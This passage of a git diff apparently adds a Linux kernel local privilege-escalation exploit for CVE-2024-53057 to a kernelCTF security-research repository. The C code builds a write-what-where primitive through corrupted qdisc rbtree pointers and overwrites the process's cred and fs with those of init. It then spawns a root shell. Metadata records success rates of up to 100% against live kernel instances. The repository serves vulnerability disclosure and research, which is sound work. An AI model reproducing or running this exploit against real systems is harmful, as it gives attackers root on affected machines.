(s) + / \ / \ + (x) (y) -> (x) (y) + / / + (p) (p) + / / + (s) (c) + \ + (c) + + y is at &n1->slot + 8 + */ + + long root_qdisc_kaddr, netdevq_kaddr; + + netdevq_kaddr = stab_read_8(n1_base_kaddr + NETDEV_OFF); + root_qdisc_kaddr = stab_read_8(netdevq_kaddr + ROOT_QDISC_OFF); + + n1_slot_buf[3] = n1_parms_kaddr - 16; // y->rb_left = &n1->latency - 16 + n1_parms_buf[0] = n1_parms_kaddr + 32; // p->rb_left = &n1->latency + 32 + n1_parms_buf[5] = root_qdisc_kaddr + PRIVDATA_OFF + ROOT_OFF + + VT_TREE_OFF; // s->rb_left = &root_qdisc->privdata.root.vt_tree + n1_parms_buf[6] = 0; // s->rb_right = NULL + + switch_ns(1); + write_netem_parms(n1, n1_parms_buf, n1_slot_buf); + + rm_timer_node(9); + + /* Set up vt_node write primitive */ + setup_vt_write(n1, n1_base_kaddr, 1); + + printf("[*] Write-what-where set up\n"); + + /* Set f_owner pointer in socket file */ + if (fcntl(inet_socks[1], F_SETOWN, getpid()) == -1) + err_exit("[-] fcntl"); + + /* Read kernel pointers */ + long task_kaddr, init_task_kaddr, init_cred_kaddr, init_fs_kaddr; + long next_addr; + + printf("[*] Getting kernel pointers\n"); + + netdevq_kaddr = stab_read_8(n2_base_kaddr + NETDEV_OFF); + next_addr = handle_to_kaddr(enq_qd, netdevq_kaddr); + + next_addr = stab_read_8(next_addr + PRIVDATA_OFF + T_HEAD_OFF); + next_addr = stab_read_8(next_addr + SK_OFF); + next_addr = stab_read_8(next_addr + SOCK_OFF); + next_addr = stab_read_8(next_addr + FILE_OFF); + next_addr = stab_read_8(next_addr + F_OWNER_OFF + PID_OFF); + next_addr = stab_read_8(next_addr + TASKS_OFF); + task_kaddr = next_addr -= PID_LINKS_OFF; + + do { + init_task_kaddr = next_addr; + next_addr = stab_read_8(next_addr + REAL_PARENT_OFF); + } while (next_addr != init_task_kaddr); + + init_cred_kaddr = stab_read_8(init_task_kaddr + CRED_OFF); + init_fs_kaddr = stab_read_8(init_task_kaddr + FS_OFF); + + printf("[+] task: %p, init_cred: %p, init_fs: %p\n", + task_kaddr, init_cred_kaddr, init_fs_kaddr); + + printf("[*] Overwriting cred and fs\n"); + + /* LPE */ + vt_write_8(task_kaddr + FS_OFF, init_fs_kaddr); + vt_write_8(task_kaddr + CRED_OFF, init_cred_kaddr); + + if (getuid()) { + printf("[-] Privesc failed\n"); + exit(EXIT_FAILURE); + } + + printf("[*] Launching shell\n"); + system("/bin/sh"); + return 0; +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/metadata.json new file mode 100644 index 000000000..4176b99d6 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/metadata.json @@ -0,0 +1,38 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": [ + "exp195" + ], + "vulnerability": { + "summary": "It is possible to create a non-ingress qdisc with handle TC_H_MAJ(TC_H_INGRESS). If a class belonging to a qdisc with this handle is deleted while a packet is enqueued at it, a dangling pointer will be left to it from the active list.", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=2e95c4384438adeaa772caa560244b1a2efef816", + "cve": "CVE-2024-53057", + "affected_versions": [ + "2.6.25 - 6.11" + ], + "requirements": { + "attack_surface": ["userns"], + "capabilities": ["CAP_NET_ADMIN"], + "kernel_config": [ + "CONFIG_NET_SCHED" + ] + } + }, + "exploits": { + "lts-6.6.52": { + "uses": ["userns"], + "requires_separate_kaslr_leak": false, + "stability_notes": "succeeds on 100% of tries against live instance" + }, + "cos-109-17800.309.59": { + "uses": ["userns"], + "requires_separate_kaslr_leak": false, + "stability_notes": "succeeds on 30% of tries against live instance" + }, + "mitigation-v3-6.1.55": { + "uses": ["userns"], + "requires_separate_kaslr_leak": false, + "stability_notes": "succeeds on 90% of tries against live instance" + } + } +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/original.tar.gz b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/original.tar.gz new file mode 100644 index 000000000..b19c2b6c6 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/original.tar.gz differ